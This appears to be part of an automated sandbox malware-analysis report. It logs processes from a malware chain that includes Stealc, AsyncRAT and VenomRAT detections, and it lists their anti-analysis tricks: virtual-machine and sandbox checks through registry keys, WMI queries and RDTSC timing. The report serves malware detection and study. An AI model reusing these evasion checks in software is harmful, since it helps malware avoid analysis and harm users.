Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AsyncRAT

Source: Yara match	File source: 38.0.XClient_protected.exe.df0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000000.2086470642.0000000000DF2000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\XClient_protected[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe, type: DROPPED

Yara detected VenomRAT

Source: Yara match

File source: Process Memory Space: XClient_protected.exe PID: 6224, type: MEMORYSTR

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	API/Special instruction interceptor: Address: 7FFB2CECE814
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	API/Special instruction interceptor: Address: 7FFB2CECD584

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: wxfM3haI2K.exe, 0000001A.00000002.1943505648.0000000003330000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE`,
Source: XClient_protected.exe, 00000026.00000000.2086470642.0000000000DF2000.00000002.00000001.01000000.00000019.sdmp, XClient_protected[1].exe.17.dr	Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
Source: wxfM3haI2K.exe, 0000001A.00000002.1943505648.0000000003330000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE
Source: wxfM3haI2K.exe, 0000001A.00000002.1943505648.0000000003330000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE@\
Source: setup2.exe, 0000001E.00000002.2041113014.000000000079D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK"

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: C9F066 second address: C9F075 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E13F3B second address: E13F47 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E13F47 second address: E13F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
